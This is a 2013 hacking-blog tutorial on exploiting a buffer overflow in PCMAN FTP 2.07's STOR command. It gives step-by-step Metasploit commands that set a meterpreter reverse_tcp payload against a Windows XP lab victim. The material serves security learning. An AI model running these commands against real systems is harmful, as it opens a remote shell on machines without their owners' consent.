Hacking Articles|Raj Chandel's Blog: Hack Remote Windows PC Using PCMAN FTP Server Post-Authentication STOR Command Stack Buffer Overflow

Hack Remote Windows PC Using PCMAN FTP Server Post-Authentication STOR Command Stack Buffer Overflow

at 12:53 PM Friday, September 20, 2013

This Metasploit module exploits a buffer overflow vulnerability found in the STOR command of the PCMAN FTP version 2.07 server when the "/../" parameters are also sent to the server. Please note authentication is required in order to trigger the vulnerability. The overflowing string will also be seen on the FTP server log console.

Exploit Targets

PCMAN FTP version 2.07

Requirement

Attacker: Backtrack 5

Victim PC: Windows XP

Open Kali Linux terminal type msfconsole

Now type use exploit/windows/ftp/pcman_stor

msf exploit (pcman_stor)>set payload windows/meterpreter/reverse_tcp

msf exploit (pcman_stor)>set lhost 192.168.1.4 (IP of Local Host)

msf exploit (pcman_stor)>set rhost 192.168.1.5 (IP of victim PC)

msf exploit (pcman_stor)>exploit

Pages

Hacking Articles|Raj Chandel's Blog

Hack Remote Windows PC Using PCMAN FTP Server Post-Authentication STOR Command Stack Buffer Overflow

0 comments:

Post a Comment

Labels

Popular Posts